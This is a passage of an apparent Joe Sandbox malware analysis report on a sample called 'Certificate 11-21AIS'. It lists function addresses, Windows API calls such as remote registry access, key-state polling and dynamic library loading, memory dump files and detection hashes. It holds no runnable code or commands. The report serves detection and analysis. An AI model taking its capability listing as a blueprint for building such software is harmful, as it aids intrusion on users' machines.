                                                                              • GetStdHandle.KERNEL32(0000000C), ref: 009095CB
                                                                              • CreateFileW.KERNEL32(nul,40000000,00000002,0000000C,00000003,00000080,00000000), ref: 00909605
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHandle$FilePipe
                                                                              • String ID: nul
                                                                              • API String ID: 4209266947-2873401336
                                                                              • Opcode ID: 8fd3b0d74784c0f4078d1fbc183fe911169f0f8d767c64841e758b4fedba9f79
                                                                              • Instruction ID: f9aa338dc97e7ee01ff22b217521e081ccca4e0365d6be3dd55763d7c81cfa42
                                                                              • Opcode Fuzzy Hash: 8fd3b0d74784c0f4078d1fbc183fe911169f0f8d767c64841e758b4fedba9f79
                                                                              • Instruction Fuzzy Hash: 1F216D74600205AFEB259F2ADC45E9E7BF8AF85724F204A19FDA1D72E2D770D940DB20
                                                                              Function 00909634 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 78filepipeCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00909653
                                                                              • CreatePipe.KERNEL32(?,?,0000000C,00000000), ref: 00909683
                                                                              • GetStdHandle.KERNEL32(000000F6), ref: 00909694
                                                                              • CreateFileW.KERNEL32(nul,80000000,00000001,0000000C,00000003,00000080,00000000), ref: 009096CE
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: CreateHandle$FilePipe
                                                                              • String ID: nul
                                                                              • API String ID: 4209266947-2873401336
                                                                              • Opcode ID: 07ca8bbf6a02d7b3636f61bfdfb1bf8154aa4147a35ee0aa177ba9053a0d499d
                                                                              • Instruction ID: 69c23c6d4a7acf002ca4dfda2129709033da78c34d324fcfa0ec68637f778511
                                                                              • Opcode Fuzzy Hash: 07ca8bbf6a02d7b3636f61bfdfb1bf8154aa4147a35ee0aa177ba9053a0d499d
                                                                              • Instruction Fuzzy Hash: 19217F75600215AFDB249F699C44E9A77ECAF85B24F200A19F8A1E72D1E7B29841CB50
                                                                              Function 0090DAF6 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 72COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SetErrorMode.KERNEL32(00000001), ref: 0090DB0A
                                                                              • GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 0090DB5E
                                                                              • __swprintf.LIBCMT ref: 0090DB77
                                                                              • SetErrorMode.KERNEL32(00000000,00000001,00000000,0095DC00), ref: 0090DBB5
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: ErrorMode$InformationVolume__swprintf
                                                                              • String ID: %lu
                                                                              • API String ID: 3164766367-685833217
                                                                              • Opcode ID: 8764657dfa8c86ce9ec559041d6356d105a3108ae4bc38406688469c83198b81
                                                                              • Instruction ID: d954a4af16a82b7417c02eab3f40b262b6e21aaa1f81e0bae8d7667d51ba1962
                                                                              • Opcode Fuzzy Hash: 8764657dfa8c86ce9ec559041d6356d105a3108ae4bc38406688469c83198b81
                                                                              • Instruction Fuzzy Hash: 83219835600108AFCB10EFA9CD85EAEBBF8FF89704B004069F909D7251DB70EA41DB61
                                                                              Function 008FC9E0 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 67windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008FC82D: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 008FC84A
                                                                                • Part of subcall function 008FC82D: GetWindowThreadProcessId.USER32(?,00000000), ref: 008FC85D
                                                                                • Part of subcall function 008FC82D: GetCurrentThreadId.KERNEL32 ref: 008FC864
                                                                                • Part of subcall function 008FC82D: AttachThreadInput.USER32(00000000), ref: 008FC86B
                                                                              • GetFocus.USER32 ref: 008FCA05
                                                                                • Part of subcall function 008FC876: GetParent.USER32(?), ref: 008FC884
                                                                              • GetClassNameW.USER32(?,?,00000100), ref: 008FCA4E
                                                                              • EnumChildWindows.USER32(?,008FCAC4), ref: 008FCA76
                                                                              • __swprintf.LIBCMT ref: 008FCA90
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows__swprintf
                                                                              • String ID: %s%d
                                                                              • API String ID: 3187004680-1110647743
                                                                              • Opcode ID: 9fec25f61a55d3d2712cb7b80edaab52b2fe81d9ed0f2aa6ff5117966c28ab16
                                                                              • Instruction ID: 21e6cded77075c059bd617a53a3d39cfd3c0e3b60f1e7adc6b66cc002155b454
                                                                              • Opcode Fuzzy Hash: 9fec25f61a55d3d2712cb7b80edaab52b2fe81d9ed0f2aa6ff5117966c28ab16
                                                                              • Instruction Fuzzy Hash: 6811ACB561021C6ACB01AFA48D89FB93B68FB45704F00807AFB08EA082DB70A645DB71
                                                                              Function 00921945 Relevance: 7.7, APIs: 5, Instructions: 232COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 009219F3
                                                                              • GetProcessIoCounters.KERNEL32(00000000,?), ref: 00921A26
                                                                              • GetProcessMemoryInfo.PSAPI(00000000,?,00000028), ref: 00921B49
                                                                              • CloseHandle.KERNEL32(?), ref: 00921BBF
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Process$CloseCountersHandleInfoMemoryOpen
                                                                              • String ID:
                                                                              • API String ID: 2364364464-0
                                                                              • Opcode ID: 0cbadd16866f8ef3a04e3d33cfe7a40b59454df5143dd15842f95b75194d9438
                                                                              • Instruction ID: 46ba085e8b5dfdf9a311b3a3c7661ed1015ac43635b664018fbebc575a786951
                                                                              • Opcode Fuzzy Hash: 0cbadd16866f8ef3a04e3d33cfe7a40b59454df5143dd15842f95b75194d9438
                                                                              • Instruction Fuzzy Hash: 8081A174600210ABDF10AF68D886BADBBF5FF08720F14845AF905AF386D7B4ED418B91
                                                                              Function 00901C9A Relevance: 7.7, APIs: 5, Instructions: 158COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • VariantInit.OLEAUT32(?), ref: 00901CB4
                                                                              • VariantClear.OLEAUT32(00000013), ref: 00901D26
                                                                              • VariantClear.OLEAUT32(00000000), ref: 00901D81
                                                                              • VariantClear.OLEAUT32(?), ref: 00901DF8
                                                                              • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 00901E26
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Variant$Clear$ChangeInitType
                                                                              • String ID:
                                                                              • API String ID: 4136290138-0
                                                                              • Opcode ID: fa964e92856139fe1a4e19f8dc3a2e0d733ccd1db769963f7e2fa53e9df7a41e
                                                                              • Instruction ID: e1720753b27fd9f5fc3baaf4fefdf5ebe2d2d7aa29ee3cbd11e24dd713c7c1c4
                                                                              • Opcode Fuzzy Hash: fa964e92856139fe1a4e19f8dc3a2e0d733ccd1db769963f7e2fa53e9df7a41e
                                                                              • Instruction Fuzzy Hash: D3514AB9A00209EFDB14CF58C884EAAB7B8FF4D314B158559E959DB390D334E951CFA0
                                                                              Function 00920688 Relevance: 7.6, APIs: 5, Instructions: 149libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008C936C: __swprintf.LIBCMT ref: 008C93AB
                                                                                • Part of subcall function 008C936C: __itow.LIBCMT ref: 008C93DF
                                                                              • LoadLibraryW.KERNEL32(?,00000004,?,?), ref: 009206EE
                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 0092077D
                                                                              • GetProcAddress.KERNEL32(00000000,00000000), ref: 0092079B
                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 009207E1
                                                                              • FreeLibrary.KERNEL32(00000000,00000004), ref: 009207FB
                                                                                • Part of subcall function 008DE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,0090A574,?,?,00000000,00000008), ref: 008DE675
                                                                                • Part of subcall function 008DE65E: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,0090A574,?,?,00000000,00000008), ref: 008DE699
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AddressProc$ByteCharLibraryMultiWide$FreeLoad__itow__swprintf
                                                                              • String ID:
                                                                              • API String ID: 327935632-0
                                                                              • Opcode ID: f09fa2dfae4d1ad6fe01c3b622d01f31e37347e032ff2b28ac4cfada8ce59425
                                                                              • Instruction ID: 3cb50041936990130f0f3bedf58311ec68cc9bfa1e2ed2bfde303fe3ce65374e
                                                                              • Opcode Fuzzy Hash: f09fa2dfae4d1ad6fe01c3b622d01f31e37347e032ff2b28ac4cfada8ce59425
                                                                              • Instruction Fuzzy Hash: 07514B79A00215DFCB00EFA8D885EADB7B9FF59310B048069E915EB352DB34ED45CB81
                                                                              Function 00922E29 Relevance: 7.6, APIs: 5, Instructions: 144registryCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 00923C06: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00922BB5,?,?), ref: 00923C1D
                                                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00922EEF
                                                                              • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00922F2E
                                                                              • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00922F75
                                                                              • RegCloseKey.ADVAPI32(?,?), ref: 00922FA1
                                                                              • RegCloseKey.ADVAPI32(00000000), ref: 00922FAE
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: Close$BuffCharConnectEnumOpenRegistryUpper
                                                                              • String ID:
                                                                              • API String ID: 3740051246-0
                                                                              • Opcode ID: df6c11b32f214ec2f6358cf043ab3d509017e0204e5817f126bec2965ab2d362
                                                                              • Instruction ID: b14a5bbd51ff5bcfd53d3b59e4ad99fbc9722d00b933ba6462975d9b25e602db
                                                                              • Opcode Fuzzy Hash: df6c11b32f214ec2f6358cf043ab3d509017e0204e5817f126bec2965ab2d362
                                                                              • Instruction Fuzzy Hash: EA514871208204AFD704EF68D991FAABBF9FF88314F04892DF595972A1DB34E904DB52
                                                                              Function 0092CCF7 Relevance: 7.6, APIs: 5, Instructions: 129COMMON
                                                                              Download Yara Rule
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID:
                                                                              • String ID:
                                                                              • API String ID:
                                                                              • Opcode ID: 04d9417f7d3cd0136329e40238a3174b19391481b2b14325db2a62e8f5a349ab
                                                                              • Instruction ID: c117bc321107185b1d0e82d8ffebc3fd0221ebc4592cf2276f9c04fe9d9dcecb
                                                                              • Opcode Fuzzy Hash: 04d9417f7d3cd0136329e40238a3174b19391481b2b14325db2a62e8f5a349ab
                                                                              • Instruction Fuzzy Hash: BB41F3B9A05224AFC720DF68EC44FADBB6CEB09310F150265F959A72E5C730AD01DB90
                                                                              Function 00911206 Relevance: 7.6, APIs: 5, Instructions: 127COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 009112B4
                                                                              • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 009112DD
                                                                              • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 0091131C
                                                                                • Part of subcall function 008C936C: __swprintf.LIBCMT ref: 008C93AB
                                                                                • Part of subcall function 008C936C: __itow.LIBCMT ref: 008C93DF
                                                                              • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00911341
                                                                              • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00911349
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                                                                              • String ID:
                                                                              • API String ID: 1389676194-0
                                                                              • Opcode ID: c3d5c59fc768ac43044b51a820255c9dac7a724fca5c4f9ea34fd931eccd9b5b
                                                                              • Instruction ID: 9489f57cb405a29b52144c6a8ca249252f89655c2d49af15c3630fb94213c75e
                                                                              • Opcode Fuzzy Hash: c3d5c59fc768ac43044b51a820255c9dac7a724fca5c4f9ea34fd931eccd9b5b
                                                                              • Instruction Fuzzy Hash: 16411C35A00109EFCB01EF68C985EADBBF5FF49310B148099E95AAB361CB31ED41DB51
                                                                              Function 008DB63C Relevance: 7.6, APIs: 5, Instructions: 110keyboardCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetCursorPos.USER32(000000FF), ref: 008DB64F
                                                                              • ScreenToClient.USER32(00000000,000000FF), ref: 008DB66C
                                                                              • GetAsyncKeyState.USER32(00000001), ref: 008DB691
                                                                              • GetAsyncKeyState.USER32(00000002), ref: 008DB69F
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: AsyncState$ClientCursorScreen
                                                                              • String ID:
                                                                              • API String ID: 4210589936-0
                                                                              • Opcode ID: 8d113cdf7bd71468cf78ad58b1ee824724d2abde26cf7f73d8c81e9a71957534
                                                                              • Instruction ID: 2ad481420c9c2ebbf5e69b62e10cc415792228754a3b48d848709bca6efe343f
                                                                              • Opcode Fuzzy Hash: 8d113cdf7bd71468cf78ad58b1ee824724d2abde26cf7f73d8c81e9a71957534
                                                                              • Instruction Fuzzy Hash: 0741AE34509119FBDF199F68D884AE9BBB4FB05324F11431AF82992290CB34AD90DFA1
                                                                              Function 008FB358 Relevance: 7.6, APIs: 5, Instructions: 88sleepwindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetWindowRect.USER32(?,?), ref: 008FB369
                                                                              • PostMessageW.USER32(?,00000201,00000001), ref: 008FB413
                                                                              • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 008FB41B
                                                                              • PostMessageW.USER32(?,00000202,00000000), ref: 008FB429
                                                                              • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 008FB431
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessagePostSleep$RectWindow
                                                                              • String ID:
                                                                              • API String ID: 3382505437-0
                                                                              • Opcode ID: c4ba2137df1ca661082546a7e87159434c9331e42f4764a92fcbf46131d7723e
                                                                              • Instruction ID: 1d3702e4ef5b51b2f18f97cdde4d4a7a4935ac08204089e75351f0de5a161c03
                                                                              • Opcode Fuzzy Hash: c4ba2137df1ca661082546a7e87159434c9331e42f4764a92fcbf46131d7723e
                                                                              • Instruction Fuzzy Hash: 4131BA7590421DEBDB04CFB8D949AAE3BB5FB05319F104229FA25EA2D1C3B09914DB91
                                                                              Function 008FDBBF Relevance: 7.6, APIs: 5, Instructions: 87windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsWindowVisible.USER32(?), ref: 008FDBD7
                                                                              • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 008FDBF4
                                                                              • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 008FDC2C
                                                                              • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 008FDC52
                                                                              • _wcsstr.LIBCMT ref: 008FDC5C
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                                                              • String ID:
                                                                              • API String ID: 3902887630-0
                                                                              • Opcode ID: 2bdd8176f9e95b7e01bf395f2a359eb85cff039a8aaa77e218803f89efcecd28
                                                                              • Instruction ID: 00713020331bd9ce723ca526fd0e9ae59fb546932a78da1b216d3afae1be0ce7
                                                                              • Opcode Fuzzy Hash: 2bdd8176f9e95b7e01bf395f2a359eb85cff039a8aaa77e218803f89efcecd28
                                                                              • Instruction Fuzzy Hash: A5212C71204248BBEB159F399C49E7B7BA9FF46750F104039FB09CA251DAA1CC41E660
                                                                              Function 008FBC77 Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 008FBC90
                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 008FBCC2
                                                                              • __itow.LIBCMT ref: 008FBCDA
                                                                              • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 008FBD00
                                                                              • __itow.LIBCMT ref: 008FBD11
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696205917.0000000000984000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_0_2_8c0000_Certificate 11-21AIS.jbxd
                                                                              Similarity
                                                                              • API ID: MessageSend$__itow
                                                                              • String ID:
                                                                              • API String ID: 3379773720-0
                                                                              • Opcode ID: 143b66e9a1780004792557894b807423251621bab49568e65f94ca18deaad187
                                                                              • Instruction ID: 452db7e456af57513499eb1fd0856b1a0c30178942d8e7b65e0bdd7e66656100
                                                                              • Opcode Fuzzy Hash: 143b66e9a1780004792557894b807423251621bab49568e65f94ca18deaad187
                                                                              • Instruction Fuzzy Hash: B521997570061CBADB11AA79CC46FEF7A68FF5A710F001025FB05EB181EB70D94587A2
                                                                              Function 00906318 Relevance: 7.6, APIs: 5, Instructions: 80COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                                • Part of subcall function 008C50E6: _wcsncpy.LIBCMT ref: 008C50FA
                                                                              • GetFileAttributesW.KERNEL32(?,?,?,?,009060C3), ref: 00906369
                                                                              • GetLastError.KERNEL32(?,?,?,009060C3), ref: 00906374
                                                                              • CreateDirectoryW.KERNEL32(?,00000000,?,?,?,009060C3), ref: 00906388
                                                                              • _wcsrchr.LIBCMT ref: 009063AA
                                                                                • Part of subcall function 00906318: CreateDirectoryW.KERNEL32(?,00000000,?,?,?,009060C3), ref: 009063E0
                                                                              Memory Dump Source
                                                                              • Source File: 00000000.00000002.1696064974.00000000008C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008C0000, based on PE: true
                                                                              • Associated: 00000000.00000002.1696048488.00000000008C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000094D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696125716.000000000096E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                              • Associated: 00000000.00000002.1696180645.000000000097A000.00000004.00000001.01000000.00000003.sdmpDownload File
